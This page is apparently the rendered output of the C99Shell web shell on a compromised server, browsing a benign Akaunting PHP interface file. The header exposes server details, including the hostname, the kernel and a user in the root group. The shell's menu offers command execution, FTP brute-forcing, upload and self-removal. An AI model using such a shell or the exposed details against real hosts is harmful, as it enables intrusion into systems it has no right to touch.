!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/akaunting/module/src/Contracts/   drwxr-xr-x
Free 28.47 GB of 117.98 GB (24.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     RepositoryInterface.php (1.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Akaunting\Module\Contracts;

interface 
RepositoryInterface
{
    
/**
     * Get all modules.
     *
     * @return mixed
     */
    
public function all();

    
/**
     * Get cached modules.
     *
     * @return array
     */
    
public function getCached();

    
/**
     * Scan & get all available modules.
     *
     * @return array
     */
    
public function scan();

    
/**
     * Get modules as modules collection instance.
     *
     * @return \Akaunting\Module\Collection
     */
    
public function toCollection();

    
/**
     * Get scanned paths.
     *
     * @return array
     */
    
public function getScanPaths();

    
/**
     * Get list of enabled modules.
     *
     * @return mixed
     */
    
public function allEnabled();

    
/**
     * Get list of disabled modules.
     *
     * @return mixed
     */
    
public function allDisabled();

    
/**
     * Get count from all modules.
     *
     * @return int
     */
    
public function count();

    
/**
     * Get all ordered modules.
     * @param string $direction
     * @return mixed
     */
    
public function getOrdered($direction 'asc');

    
/**
     * Get modules by the given status.
     *
     * @param int $status
     *
     * @return mixed
     */
    
public function getByStatus($status);

    
/**
     * Find a specific module.
     *
     * @param $name
     *
     * @return mixed
     */
    
public function find($name);

    
/**
     * Find a specific module. If there return that, otherwise throw exception.
     *
     * @param $name
     *
     * @return mixed
     */
    
public function findOrFail($name);

    public function 
getModulePath($moduleName);

    
/**
     * @return \Illuminate\Filesystem\Filesystem
     */
    
public function getFiles();

    
/**
     * Get a specific config data from a configuration file.
     * @param string $key
     *
     * @param string|null $default
     * @return mixed
     */
    
public function config(string $key$default null);
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0053 ]--